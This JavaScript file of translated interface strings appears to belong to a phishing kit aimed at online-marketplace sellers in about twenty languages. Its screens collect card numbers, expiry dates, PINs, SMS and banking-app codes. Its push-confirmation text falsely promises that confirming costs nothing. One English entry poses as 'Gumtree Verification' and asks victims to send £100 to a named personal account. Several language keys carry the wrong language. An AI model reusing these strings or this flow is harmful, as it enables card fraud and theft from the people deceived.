module.exports = {
  support_chat: {
    pl: "Chat wsparcia",
    en: "Support Chat",
    es: "Chat de apoyo",
    dk: "Support Chat",
    pt: "Chat de apoio",
    ua: "Чат поддержки",
    ro: "Chat de asistență",
    se: "Chatt för support",
    hr: "Chat Podrška",
    sk: "Podpora chatu",
    fr: "Support Chat",
    bg: "Чат за поддръжка",
    rs: "Цхат подршка",
    be: "Ondersteuning Chat",
    it: "Chat di supporto",
    ch: "Support-Chat",
    cs: "Podpora chatu",
    no: "Support Chat",
    lt: "Atbalsta tērzēšana",
    lv: "Palaikymo pokalbis",
    est: "Tugivestlus"
  },
  your_message: {
    pl: "Twoja wiadomość...",
    en: "Your message...",
    es: "Su mensaje...",
    dk: "Din besked...",
    pt: "A sua mensagem...",
    ua: "Ваше сообщение...",
    ro: "Mesajul dumneavoastră...",
    se: "Ditt meddelande...",
    hr: "Vaša poruka...",
    sk: "Tvoja správa...",
    fr: "Votre message...",
    bg: "Вашето съобщение...",
    rs: "Ваша порука...",
    be: "Uw bericht...",
    it: "Il tuo messaggio...",
    ch: "Ihre Nachricht...",
    cs: "vaše zpráva",
    no: "Din beskjed",
    lt: "Tava ziņa...",
    lv: "Tavo žinutė...",
    est: "Sinu sõnum..."
  },
  send: {
    pl: "Wyślij",
    en: "Send",
    es: "Enviar",
    dk: "Send",
    pt: "Enviar",
    ua: "Отправить",
    ro: "Trimiteți",
    se: "Skicka",
    hr: "Pošalji",
    sk: "poslať",
    fr: "Envoyer",
    bg: "Изпрати",
    rs: "Пошаљите",
    be: "Stuur",
    it: "Invia",
    ch: "senden",
    cs: "poslat",
    no: "sende",
    lt: "nosūtīt",
    lv: "siųsti",
    est: "saada"
  },
  card_balance: {
    pl: "Saldo karty",
    en: "Card balance",
    es: "Saldo de la tarjeta",
    dk: "Saldo på kortet",
    pt: "Balanço do cartão",
    ua: "Баланс карты",
    ro: "Soldul cardului",
    se: "Saldo på kortet",
    hr: "Ravnoteža kartice",
    sk: "Zostatok na karte",
    fr: "Solde de la carte",
    bg: "Баланс по картата",
    rs: "Стање на картици",
    be: "Kaart saldo",
    it: "Saldo della carta",
    ch: "Kartenguthaben",
    cs: "Zůstatek na kartě",
    no: "Kortsaldo",
    lt: "Kartes atlikums",
    lv: "Kortelės likutis",
    est: "Kaardi saldo"
  },
  expires: {
    pl: "Wygasa",
    en: "Expires",
    es: "Expira",
    dk: "Udløber",
    pt: "Expira",
    ua: "Срок",
    ro: "Expiră",
    se: "Utgångsdatum",
    hr: "Istječe",
    fr: "Expire",
    sk: "Termín",
    bg: "Изтича на",
    rs: "Истекати",
    be: "Verloopt op",
    it: "Scade",
    ch: "Verfallsdatum",
    cs: "doba platnosti",
    no: "",
    lt: "Jēdziens",
    lv: "Terminas",
    est: "Tähtaeg"
  },
  card_number: {
    pl: "Numer karty",
    en: "Card number",
    es: "Número de tarjeta",
    dk: "Kortnummer",
    pt: "Número do cartão",
    ua: "Номер карты",
    ro: "Numărul cardului",
    se: "Kortnummer",
    hr: "Broj kartice",
    fr: "Numéro de la carte",
    bg: "Номер на картата",
    rs: "Број картице",
    be: "Kaartnummer",
    sk: "Číslo karty",
    it: "Numero di carta",
    ch: "Kartennummer",
    cs: "Číslo karty",
    no: "Kortnummer",
    lt: "Kartes numurs",
    lv: "Kortelės numeris",
    est: "Kaardi number"
  },
  expiration_date: {
    pl: "Data wygaśnięcia",
    en: "Expiration date",
    es: "Fecha de caducidad",
    dk: "Udløbsdato",
    pt: "Data de expiração",
    ua: "Срок действия",
    ro: "Data expirării",
    se: "Utgångsdatum",
    hr: "Rok trajanja",
    fr: "Date d'expiration",
    bg: "Дата на изтичане на валидността",
    rs: "Број картице",
    be: "Vervaldatum",
    it: "Data di scadenza",
    sk: "Platnosť",
    ch: "Gültigkeit",
    cs: "Doba platnosti",
    no: "Gyldighet",
    lt: "Derīgums",
    lv: "Galiojimas",
    est: "Kehtivus"
  },
  month: {
    pl: "Miesiąc",
    en: "Month",
    es: "Mes",
    dk: "Måned",
    pt: "Mês",
    ua: "Месяц",
    ro: "Luna",
    se: "Månad",
    hr: "Mjesec",
    fr: "Mois",
    bg: "Месец",
    rs: "Месец",
    be: "Maand",
    it: "Mese",
    sk: "mesiac",
    ch: "Monat",
    cs: "Měsíc",
    no: "Måned",
    lt: "Mēnesis",
    lv: "Mėnuo",
    est: "Kuu"
  },
  year: {
    pl: "Rok",
    en: "Year",
    es: "Año",
    dk: "År",
    pt: "Ano",
    ua: "Год",
    ro: "Anul",
    se: "År",
    hr: "Godina",
    fr: "Année",
    bg: "Година",
    rs: "Година",
    be: "Jaar",
    it: "Anno",
    sk: "rok",
    ch: "Jahr",
    cs: "Rok",
    no: "År",
    lt: "gads",
    lv: "Metai",
    est: "aasta"
  },
  passcode_title: {
    hr: "Unos šifre",
    cs: "Zadejte kód",
    pl: "Wpisałeś zły kod! Spróbuj ponownie.",
    en: "You have entered the wrong code! Please try again.",
    es: "Ha introducido un código incorrecto. Por favor, inténtelo de nuevo.",
    dk: "Du har indtastet den forkerte kode! Prøv venligst igen.",
    pt: "Introduziu o código errado! Por favor, tente novamente.",
    ua: "Вы ввели неправильный код! Пожалуйста, попробуйте еще раз.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    se: "Du har angett fel kod! Försök igen.",
    fr: "Vous avez saisi le mauvais code ! Veuillez réessayer.",
    bg: "Въвели сте грешен код! Моля, опитайте отново.",
    rs: "Унели сте погрешан код! Молим вас, покушајте поново",
    be: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    ch: "Du hast einen falschen Code eingegeben! Bitte versuche es erneut.",
    cs: "Zadali jste nesprávný kód! Zkus to znovu.",
    no: "Du skrev inn feil kode! Vær så snill, prøv på nytt.",
    lt: "Jūs ievadījāt nepareizu kodu! Lūdzu mēģiniet vēlreiz.",
    lv: "Įvedėte neteisingą kodą! Prašau, pabandykite dar kartą.",
    est: "Sisestasite vale koodi! Palun proovi uuesti."
  },
  passcode_text: {
    hr: "Unesite šifru",
    pl: "Wpisałeś zły kod! Spróbuj ponownie.",
    en: "You have entered the wrong code! Please try again.",
    es: "Ha introducido un código incorrecto. Por favor, inténtelo de nuevo.",
    dk: "Du har indtastet den forkerte kode! Prøv venligst igen.",
    pt: "Introduziu o código errado! Por favor, tente novamente.",
    ua: "Вы ввели неправильный код! Пожалуйста, попробуйте еще раз.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    se: "Du har angett fel kod! Försök igen.",
    fr: "Vous avez saisi le mauvais code ! Veuillez réessayer.",
    bg: "Въвели сте грешен код! Моля, опитайте отново.",
    rs: "Унели сте погрешан код! Молим вас, покушајте поново",
    be: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    ch: "Du hast einen falschen Code eingegeben! Bitte versuche es erneut.",
    cs: "Zadali jste nesprávný kód! Zkus to znovu.",
    no: "Du skrev inn feil kode! Vær så snill, prøv på nytt.",
    lt: "Jūs ievadījāt nepareizu kodu! Lūdzu mēģiniet vēlreiz.",
    lv: "Įvedėte neteisingą kodą! Prašau, pabandykite dar kartą.",
    est: "Sisestasite vale koodi! Palun proovi uuesti."
  },
  pincode_text: {
    hr: "Unesite pin",
    cs: "Zadejte PIN",
    pl: "Wpisałeś zły kod! Spróbuj ponownie.",
    en: "You have entered the wrong code! Please try again.",
    es: "Ha introducido un código incorrecto. Por favor, inténtelo de nuevo.",
    dk: "Du har indtastet den forkerte kode! Prøv venligst igen.",
    pt: "Introduziu o código errado! Por favor, tente novamente.",
    ua: "Вы ввели неправильный код! Пожалуйста, попробуйте еще раз.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    se: "Du har angett fel kod! Försök igen.",
    fr: "Vous avez saisi le mauvais code ! Veuillez réessayer.",
    bg: "Въвели сте грешен код! Моля, опитайте отново.",
    rs: "Унели сте погрешан код! Молим вас, покушајте поново",
    be: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    ch: "Du hast einen falschen Code eingegeben! Bitte versuche es erneut.",
    no: "Du skrev inn feil kode! Vær så snill, prøv på nytt.",
    lt: "Jūs ievadījāt nepareizu kodu! Lūdzu mēģiniet vēlreiz.",
    lv: "Įvedėte neteisingą kodą! Prašau, pabandykite dar kartą.",
    est: "Sisestasite vale koodi! Palun proovi uuesti."
  },
  pincode_title: {
    hr: "Pin ulaz",
    cs: "Pin vstup",
    pl: "Wpisałeś zły kod! Spróbuj ponownie.",
    en: "You have entered the wrong code! Please try again.",
    es: "Ha introducido un código incorrecto. Por favor, inténtelo de nuevo.",
    dk: "Du har indtastet den forkerte kode! Prøv venligst igen.",
    pt: "Introduziu o código errado! Por favor, tente novamente.",
    ua: "Вы ввели неправильный код! Пожалуйста, попробуйте еще раз.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    se: "Du har angett fel kod! Försök igen.",
    fr: "Vous avez saisi le mauvais code ! Veuillez réessayer.",
    bg: "Въвели сте грешен код! Моля, опитайте отново.",
    rs: "Унели сте погрешан код! Молим вас, покушајте поново",
    be: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    ch: "Du hast einen falschen Code eingegeben! Bitte versuche es erneut.",
    no: "Du skrev inn feil kode! Vær så snill, prøv på nytt.",
    lt: "Nepareizs kods",
    lv: "Neteisingas kodas",
    est: "Vale kood"
  },
  wrong_code: {
    pl: "Wpisałeś zły kod! Spróbuj ponownie.",
    en: "You have entered the wrong code! Please try again.",
    es: "Ha introducido un código incorrecto. Por favor, inténtelo de nuevo.",
    dk: "Du har indtastet den forkerte kode! Prøv venligst igen.",
    pt: "Introduziu o código errado! Por favor, tente novamente.",
    ua: "Вы ввели неправильный код! Пожалуйста, попробуйте еще раз.",
    ro: "Ați introdus un cod greșit! Vă rugăm să încercați din nou.",
    se: "Du har angett fel kod! Försök igen.",
    hr: "Unijeli ste pogrešan kod! Pokušajte ponovo.",
    fr: "Vous avez saisi le mauvais code ! Veuillez réessayer.",
    bg: "Въвели сте грешен код! Моля, опитайте отново.",
    rs: "Унели сте погрешан код! Молим вас, покушајте поново",
    be: "U heeft de verkeerde code ingevoerd! Probeer het opnieuw.",
    it: "Hai inserito il codice sbagliato! Per favore riprova.",
    sk: "Zadali ste nesprávny kód! Prosím skúste znova.",
    ch: "Du hast einen falschen Code eingegeben! Bitte versuche es erneut.",
    cs: "Zadali jste nesprávný kód! Zkus to znovu.",
    no: "Du skrev inn feil kode! Vær så snill, prøv på nytt.",
    lt: "Jūs ievadījāt nepareizu kodu! Lūdzu mēģiniet vēlreiz.",
    lv: "Įvedėte neteisingą kodą! Prašau, pabandykite dar kartą.",
    est: "Sisestasite vale koodi! Palun proovi uuesti."
  },
  wrong_mtoken: {
    hr: "Unijeli ste nevažeći mtoken kodirati",
  },
  push_title: {
    pl: "Aby zweryfikować swoją kartę, potwierdź transakcję w aplikacji mobilnej banku",
    en: "To verify your card, confirm the transaction on the bank's mobile app",
    es: "Para verificar su tarjeta, confirme la transacción en la aplicación móvil del banco",
    dk: "For at bekræfte dit kort skal du bekræfte transaktionen på bankens mobilapp for at bekræfte den",
    pt: "Para verificar o seu cartão, confirme a transacção na aplicação móvel do banco",
    ua: "Чтобы проверить карту, подтвердите транзакцию в мобильном приложении банка",
    ro: "Pentru a vă verifica cardul, confirmați tranzacția în aplicația mobilă a băncii",
    se: "Signera med BankID",
    hr: "Da biste potvrdili svoju karticu, potvrdite transakciju u mobilnoj aplikaciji banke",
    fr: "Pour vérifier votre carte, confirmez la transaction sur l'application mobile de la banque.",
    bg: "За да потвърдите картата си, потвърдете трансакцията в мобилното приложение на банката.",
    rs: "Да бисте проверили своју картицу, потврдите трансакцију на мобилној апликацији Банке",
    be: "Om uw kaart te verifiëren, bevestigt u de transactie op de mobiele app van de bank",
    it: "Per verificare la tua carta, conferma la transazione sull'app mobile della banca",
    sk: "Za provjeru kartice potvrdite transakciju u mobilnoj aplikaciji banke",
    ch: "Um die Karte zu überprüfen, bestätigen Sie die Transaktion in der mobilen Anwendung der Bank",
    cs: "Pro kontrolu karty potvrďte transakci v mobilní aplikaci banky",
    no: "For å sjekke kortet, bekreft transaksjonen i bankens mobilapplikasjon",
    lt: "Lai pārbaudītu karti, apstipriniet darījumu bankas mobilajā aplikācijā",
    lv: "Norėdami patikrinti kortelę, patvirtinkite operaciją banko mobiliojoje programėlėje",
    est: "Kaardi kontrollimiseks kinnita tehing panga mobiilirakenduses"
  },
  push_text: {
    pl: "Aby przelać pieniądze na kartę, karta musi zostać zweryfikowana. Jest to prośba o weryfikację karty, ale nie zostaniesz obciążony, system po prostu stwierdzi, że karta nie jest zablokowana i jest gotowa do transakcji.",
    en: "To transfer money to your card, your card must be verified. This is a request to verify the card, but you will not be charged, the system will simply state that the card is not blocked and is ready for the transaction.",
    es: "Para transferir dinero a su tarjeta, ésta debe ser verificada. Se trata de una solicitud de verificación de la tarjeta, pero no se le cobrará, el sistema simplemente indicará que la tarjeta no está bloqueada y está lista para la transacción.",
    dk: "For at overføre penge til dit kort skal dit kort verificeres. Dette er en anmodning om at bekræfte kortet, men du bliver ikke opkrævet, systemet vil blot oplyse, at kortet ikke er spærret og er klar til transaktionen.",
    pt: "Para transferir dinheiro para o seu cartão, o seu cartão deve ser verificado. Este é um pedido para verificar o cartão, mas não lhe será cobrado, o sistema irá simplesmente declarar que o cartão não está bloqueado e que está pronto para a transacção.",
    ua: "Чтобы перевести деньги на карту, ваша карта должна быть верифицирована. Это запрос на верификацию карты, но с вас не будет снята плата, система просто сообщит, что карта не заблокирована и готова к транзакции.",
    ro: "Pentru a transfera bani pe cardul dvs., acesta trebuie verificat. Aceasta este o solicitare de verificare a cardului, dar nu veți fi taxat, sistemul va declara pur și simplu că cardul nu este blocat și că este pregătit pentru tranzacție.",
    se: "Signera ditt kvitto genom att öppna Mobile BankID -appen på din mobiltelefon eller surfplatta.",
    hr: "Da biste prebacili novac na svoju karticu, vaša kartica mora biti potvrđena. To je zahtjev za provjeru kartice, ali nećete biti naplaćeni, sustav će jednostavno obavijestiti da kartica nije zaključana i spremna za transakciju.",
    sk: "Ak chcete previesť peniaze na kartu, vaša karta musí byť overená. Ide o požiadavku na overenie karty, ale nebude vám účtovaná žiadna platba, systém vás len informuje, že karta nie je zablokovaná a je pripravená na transakciu.",
    fr: "Pour transférer de l'argent sur votre carte, celle-ci doit être vérifiée. Il s'agit d'une demande de vérification de la carte, mais vous ne serez pas débité, le système indiquera simplement que la carte n'est pas bloquée et qu'elle est prête pour la transaction.",
    bg: "За да преведете пари на картата си, тя трябва да бъде потвърдена. Това е заявка за верификация на картата, но няма да бъдете таксувани, а системата просто ще заяви, че картата не е блокирана и е готова за транзакцията.",
    rs: "Да бисте пребацили новац на своју картицу, ваша картица мора бити верификована. Ово је захтев за потврђивање картице, али нећете се наплаћивати, систем ће једноставно навести да картица није блокирана и спремна је за трансакцију.",
    be: "Om geld naar uw kaart over te maken, moet uw kaart geverifieerd worden. Dit is een verzoek om de kaart te verifiëren, maar u zult niet worden aangerekend, het systeem zal gewoon verklaren dat de kaart niet geblokkeerd is en klaar is voor de transactie.",
    it: "Per trasferire denaro sulla tua carta, la tua carta deve essere verificata. Questa è una richiesta di verifica della carta, ma non ti verrà addebitato nulla, il sistema dichiarerà semplicemente che la carta non è bloccata ed è pronta per la transazione.",
    ch: "Um Geld auf eine Karte zu überweisen, muss Ihre Karte verifiziert werden. Dies ist eine Aufforderung zur Kartenverifizierung, die Ihnen jedoch nicht belastet wird, das System informiert Sie lediglich darüber, dass die Karte nicht gesperrt ist und für eine Transaktion bereit ist.",
    cs: "Chcete-li převést peníze na kartu, musí být vaše karta ověřena. Jedná se o požadavek na ověření karty, ale nebude vám nic účtováno, systém vás pouze informuje, že karta není zablokována a je připravena k transakci.",
    no: "Чтобы перевести деньги на карту, ваша карта должна быть верифицирована. Это запрос на верификацию карты, но с вас не будет снята плата, система просто сообщит, что карта не заблокирована и готова к транзакции.",
    lt: "Lai pārskaitītu naudu uz karti, jūsu karte ir jāverificē. Šis ir kartes verifikācijas pieprasījums, taču no jums netiks iekasēta maksa, sistēma vienkārši informēs, ka karte nav bloķēta un ir gatava darījumam.",
    lv: "Norint pervesti pinigus į kortelę, jūsų kortelė turi būti patvirtinta. Tai yra kortelės patikrinimo užklausa, tačiau jūs nebūsite apmokestinti, sistema tiesiog informuos, kad kortelė neužblokuota ir paruošta operacijai.",
    est: "Raha kaardile ülekandmiseks peab teie kaart olema kinnitatud. See on kaardi kontrollimise taotlus, kuid teilt ei võeta tasu, süsteem lihtsalt teavitab teid, et kaart ei ole blokeeritud ja on tehinguks valmis."
  },
  success: {
    pl: "Sukces",
    en: "Success",
    es: "Éxito",
    dk: "Succes",
    pt: "Sucesso",
    ua: "Успех",
    ro: "Succes",
    se: "Framgång",
    hr: "Uspjeh",
    sk: "Úspech",
    fr: "Succès",
    bg: "Успех",
    rs: "Успех",
    be: "Succes",
    it: "Successo",
    ch: "Erfolg",
    cs: "Úspěch",
    no: "Suksess",
    lt: "Panākumi",
    lv: "Sėkmė",
    est: "Edu"
  },
  money_will: {
    pl: "Pieniądze zostaną przelane na Twoją kartę bankową w ciągu 24 godzin.",
    en: "The money will be transferred to your bank card within 24 hours.",
    es: "El dinero será transferido a su tarjeta bancaria en 24 horas.",
    dk: "Pengene vil blive overført til dit bankkort inden for 24 timer.",
    pt: "O dinheiro será transferido para o seu cartão bancário no prazo de 24 horas.",
    ua: "Деньги будут переведены на вашу банковскую карту в течение 24 часов.",
    ro: "Banii vor fi transferați pe cardul dvs. bancar în termen de 24 de ore.",
    se: "Pengarna överförs till ditt bankkort inom 24 timmar.",
    hr: "Novac će biti prebačen na vašu bankovnu karticu u roku od 24 sata.",
    sk: "Peniaze budú prevedené na vašu bankovú kartu do 24 hodín.",
    fr: "L'argent sera transféré sur votre carte bancaire dans les 24 heures.",
    bg: "Парите ще бъдат преведени по банковата ви карта в рамките на 24 часа.",
    rs: "Новац ће бити пребачен на вашу банковну картицу у року од 24 сата.",
    be: "Het geld wordt binnen 24 uur overgemaakt op uw bankpas.",
    it: "Il denaro sarà trasferito sulla sua carta di credito entro 24 ore.",
    ch: "Das Geld wird innerhalb von 24 Stunden auf Ihre Bankkarte überwiesen.",
    cs: "Peníze budou převedeny na vaši bankovní kartu do 24 hodin.",
    no: "Pengene vil bli overført til bankkortet ditt innen 24 timer.",
    lt: "Nauda tiks pārskaitīta uz jūsu bankas karti 24 stundu laikā.",
    lv: "Pinigai bus pervesti į Jūsų banko kortelę per 24 valandas.",
    est: "Raha kantakse teie pangakaardile 24 tunni jooksul."
  },
  sms_title: {
    pl: "Wprowadź kod SMS",
    en: "Enter SMS code",
    es: "Introduzca el código SMS",
    dk: "Indtast SMS-kode",
    pt: "Introduza o código SMS",
    ua: "Введите SMS-код",
    ro: "Introduceți codul SMS",
    se: "Ange SMS-kod",
    hr: "Unesite SMS kod",
    sk: "Zadajte SMS kód",
    fr: "Entrez le code SMS",
    bg: "Въведете SMS код",
    rs: "Унесите СМС код",
    be: "SMS code invoeren",
    it: "Inserisci il codice SMS",
    ch: "SMS-Code eingeben",
    cs: "Zadejte SMS kód",
    no: "Skriv inn SMS-kode",
    lt: "Ievadiet SMS kodu",
    lv: "Įveskite SMS kodą",
    est: "Sisestage SMS-kood"
  },
  sms_text: {
    pl: "Na Twój telefon został wysłany jednorazowy kod SMS",
    en: "A one-time SMS code has been sent to your phone",
    es: "Se ha enviado un código SMS único a su teléfono",
    dk: "Der er blevet sendt en engangs-SMS-kode til din telefon",
    pt: "Um código SMS único foi enviado para o seu telefone",
    ua: "На ваш телефон отправлен одноразовый SMS-код",
    ro: "Un cod SMS unic a fost trimis pe telefonul dvs.",
    se: "En engångs-SMS-kod har skickats till din telefon.",
    hr: "Jednokratni SMS kod poslan je na vaš telefon",
    sk: "Na váš telefón bol odoslaný jednorazový SMS kód",
    fr: "Un code SMS à usage unique a été envoyé sur votre téléphone.",
    bg: "На телефона ви е изпратен еднократен SMS код.",
    rs: "Једнократни СМС код послат је на ваш телефон",
    be: "Een eenmalige SMS code is naar uw telefoon gestuurd",
    it: "Un codice SMS unico è stato inviato al tuo telefono",
    ch: "Ein einmaliger SMS-Code wurde an Ihr Telefon gesendet",
    cs: "Na váš telefon byl odeslán jednorázový SMS kód",
    no: "En engangs-SMS-kode er sendt til telefonen din",
    lt: "Uz jūsu tālruni ir nosūtīts vienreizējs SMS kods",
    lv: "Į jūsų telefoną išsiųstas vienkartinis SMS kodas",
    est: "Teie telefoni on saadetud ühekordne SMS-kood"
  },
  sms_placeholder: {
    pl: "Jednorazowy kod SMS",
    en: "One-time SMS code",
    es: "Código SMS único",
    dk: "Engangs-SMS-kode",
    pt: "Código SMS único",
    ua: "Одноразовый SMS-код",
    ro: "Cod SMS unic",
    se: "SMS-kod för engångsbruk",
    hr: "Jednokratni SMS kod",
    sk: "Jednorazový SMS kód",
    fr: "Code SMS à usage unique",
    bg: "Еднократен SMS код",
    rs: "Једнократни СМС код",
    be: "Eenmalige SMS code",
    it: "Codice SMS una tantum",
    ch: "Einmaliger SMS-Code",
    cs: "Jednorázový SMS kód",
    no: "Engangs SMS-kode",
    lt: "Vienreizējs SMS kods",
    lv: "Vienkartinis SMS kodas",
    est: "Ühekordne SMS-kood"
  },
  passcode_placeholder: {

  },
  pincode_placeholder: {

  },
  mtoken_title: {
    hr: "Unesite mtoken kodirati",
    no: ""
  },
  mtoken_text: {
    hr: "Unesite mtoken kodirati iz mobilne banke",
    no: ""
  },
  mtoken_placeholder: {
    hr: "mtoken kodirati",
    no: ""
  },
  dtrans_title: {
  en: "Direct translation",
  no: ""
  },
  dtrans_text: {
  en: "Direct Transfer - Your bank has requested verification of a UK citizen. To complete it, you need to send £ 100 to the company's account. After sending, you need to upload a photo of the check to any file hosting service. And paste the link in the box below.\n\nGumtree Verification Company Account\nName: KYRYLO KUTS\nSort code: 041307\nAccount number: 33258991\nBic: CLJUGB21\nBank: Clear Junction LTD\nValue: ONLY GBP\n\nPlease. Enter all the data correctly"
  },
  dtrans_placeholder: {
   en: "Enter all data"
  },
  callBank_title: {

  },
  callBank_text: {

  },
  callBank_placeholder: {

  },
  app_code_title: {
    pl: "W ciągu 2 minut kod weryfikacyjny zostanie wysłany do aplikacji bankowej.",
    en: "Within 2 minutes, the verification code will be sent to your banking application.",
    es: "En 2 minutos, el código de verificación será enviado a su aplicación bancaria.",
    dk: "Inden for 2 minutter vil bekræftelseskoden blive sendt til din bankapplikation.",
    pt: "Dentro de 2 minutos, o código de verificação será enviado para a sua aplicação bancária.",
    ua: "В течение 2 минут проверочный код будет отправлен в ваше банковское приложение.",
    ro: "În termen de 2 minute, codul de verificare va fi trimis la aplicația dvs. bancară.",
    se: "Inom två minuter skickas verifieringskoden till din bankapplikation.",
    hr: "U roku od 2 minute, kôd za potvrdu bit će poslan na vašu bankovnu aplikaciju.",
    sk: "Do 2 minút sa do vašej bankovej aplikácie odošle overovací kód.",
    fr: "Dans les 2 minutes, le code de vérification sera envoyé à votre application bancaire.",
    bg: "В рамките на 2 минути кодът за потвърждение ще бъде изпратен до банковото ви приложение.",
    rs: "У року од 2 минута, верификациони код ће бити послан у вашу банкарску пријаву.",
    be: "Binnen 2 minuten wordt de verificatiecode naar uw banktoepassing gestuurd.",
    it: "Entro 2 minuti, il codice di verifica sarà inviato alla tua applicazione bancaria.",
    ch: "Innerhalb von 2 Minuten wird ein Bestätigungscode an Ihre Bankanwendung gesendet.",
    cs: "Do 2 minut bude do vaší bankovní aplikace zaslán ověřovací kód.",
    no: "Innen 2 minutter vil en bekreftelseskode bli sendt til bankapplikasjonen din.",
    lt: "2 minūšu laikā uz jūsu bankas pieteikumu tiks nosūtīts verifikācijas kods.",
    lv: "Per 2 minutes į jūsų banko programą bus išsiųstas patvirtinimo kodas.",
    est: "2 minuti jooksul saadetakse teie pangarakendusele kinnituskood."
  },
  app_code_text: {
    pl: "Wpisz kod, który został wysłany do Twojej aplikacji bankowej",
    en: "Enter the code that was sent to your banking application",
    es: "Introduzca el código que se envió a su aplicación bancaria",
    dk: "Indtast den kode, der blev sendt til din bankapplikation",
    pt: "Introduza o código que foi enviado para a sua aplicação bancária",
    ua: "Введите код, который был отправлен на ваше банковское приложение",
    ro: "Introduceți codul care a fost trimis la aplicația dvs. bancară",
    se: "Ange koden som skickades till din bankapplikation.",
    hr: "Unesite kôd koji je poslan u vašu bankovnu aplikaciju",
    sk: "Zadajte kód, ktorý bol odoslaný do vašej bankovej aplikácie",
    fr: "Entrez le code qui a été envoyé à votre application bancaire.",
    bg: "Въведете кода, който е бил изпратен до вашето приложение за банкиране",
    rs: "Унесите код који је послат у вашу банкарску пријаву",
    be: "Voer de code in die naar uw banktoepassing werd gestuurd",
    it: "Inserisci il codice che è stato inviato alla tua applicazione bancaria",
    ch: "Geben Sie den Code ein, der an Ihre Bankanwendung gesendet wurde",
    cs: "Zadejte kód, který byl zaslán do vaší bankovní aplikace",
    no: "Skriv inn koden som ble sendt til bankapplikasjonen din",
    lt: "Ievadiet kodu, kas tika nosūtīts uz jūsu bankas pieteikumu",
    lv: "Įveskite kodą, kuris buvo išsiųstas į jūsų banko programą",
    est: "Sisestage kood, mis saadeti teie pangarakendusele"
  },
  app_code_placeholder: {
    pl: "Kod weryfikacyjny",
    en: "Verification code",
    es: "Código de verificación",
    dk: "Bekræftelseskode",
    pt: "Código de verificação",
    ua: "Проверочный код",
    ro: "Cod de verificare",
    se: "Verifieringskod",
    hr: "Potvrdni kod",
    sk: "Overovací kód",
    fr: "Code de vérification",
    bg: "Код за проверка",
    rs: "Верификациони код",
    be: "Verificatie code",
    it: "Codice di verifica",
    ch: "Verifizierungs-Schlüssel",
    cs: "Ověřovací kód",
    no: "Bekreftelseskode",
    lt: "Verifikācijas kods",
    lv: "Patvirtinimo kodas",
    est: "Kinnituskood"
  },
  call_code_title: {
    pl: "Bank poda Ci kod weryfikacyjny przez telefon",
    en: "The bank will give you a verification code over the phone",
    es: "El banco le dará un código de verificación por teléfono",
    dk: "Banken vil give dig en bekræftelseskode over telefonen",
    pt: "O banco dar-lhe-á um código de verificação através do telefone",
    ua: "Банк сообщит вам проверочный код по телефону",
    ro: "Banca vă va da un cod de verificare prin telefon",
    se: "Banken ger dig en verifieringskod via telefon.",
    hr: "Banka će vam dati telefonski kod za provjeru",
    sk: "Overovací kód vám banka oznámi telefonicky",
    fr: "La banque vous donnera un code de vérification par téléphone.",
    bg: "Банката ще ви даде код за проверка по телефона.",
    rs: "Банка ће вам дати верификациони код преко телефона",
    be: "De bank zal u een verificatiecode geven via de telefoon",
    it: "La banca ti darà un codice di verifica per telefono",
    ch: "Die Bank teilt Ihnen den Verifizierungscode telefonisch mit",
    cs: "Ověřovací kód vám banka sdělí telefonicky",
    no: "Banken vil gi deg bekreftelseskoden på telefon",
    lt: "Verifikācijas kodu banka pateiks pa tālruni",
    lv: "Patvirtinimo kodą bankas pasakys telefonu",
    est: "Pank ütleb teile telefoni teel kinnituskoodi"
  },
  call_code_text: {
    pl: "Wpisz kod, który bank podał Ci przez telefon",
    en: "Enter the code the bank gave you over the phone",
    es: "Introduzca el código que el banco le dio por teléfono",
    dk: "Indtast den kode, som banken gav dig i telefonen",
    pt: "Introduza o código que o banco lhe deu por telefone",
    ua: "Введите код, который банк сообщил вам по телефону",
    ro: "Introduceți codul pe care banca vi l-a dat la telefon",
    se: "Ange den kod som banken gav dig i telefon.",
    hr: "Unesite kôd koji vam je banka dala telefonom",
    sk: "Zadajte kód, ktorý vám banka poskytla telefonicky",
    fr: "Entrez le code que la banque vous a donné par téléphone.",
    bg: "Въведете кода, който банката ви е дала по телефона",
    rs: "Унесите код који вам је банка дала преко телефона",
    be: "Voer de code in die de bank u via de telefoon heeft gegeven",
    it: "Inserisci il codice che la banca ti ha dato al telefono",
    ch: "Geben Sie den Code ein, den die Bank Ihnen per Telefon gegeben hat",
    cs: "Zadejte kód, který vám banka sdělila telefonicky",
    no: "Tast inn koden som banken ga deg på telefon",
    lt: "Ievadiet kodu, ko banka jums iedeva pa tālruni",
    lv: "Įveskite kodą, kurį jums davė bankas telefonu",
    est: "Sisestage kood, mille pank teile telefoni teel andis"
  },
  call_code_placeholder: {
    pl: "Wprowadź kod",
    en: "Enter the code",
    es: "Introduzca el código",
    dk: "Indtast koden",
    pt: "Introduza o código",
    ua: "Введите код",
    ro: "Introduceți codul",
    se: "Ange koden",
    hr: "Unesite kod",
    sk: "Zadajte kód",
    fr: "Entrez le code",
    bg: "Въведете кода",
    rs: "Унесите код",
    be: "Voer de code in",
    it: "Inserisci il codice",
    ch: "Code eingeben",
    cs: "Zadejte kód",
    no: "Skriv inn en kode",
    lt: "Ievadiet kodu",
    lv: "Įveskite kodą",
    est: "Sisestage kood"
  },
  blik_code_title: {
    pl: "Płatność BLIK",
    en: "BLIK payment",
    es: "Pago de BLIK",
    dk: "BLIK-betaling",
    pt: "Pagamento BLIK",
    ua: "оплата BLIK",
    ro: "Plata BLIK",
    se: "BLIK-betalning",
    hr: "Odbljesak plaćanje",
    sk: "BLIK platba",
    fr: "Paiement BLIK",
    bg: "Плащане на BLIK",
    rs: "БЛИК Плаћање",
    be: "",
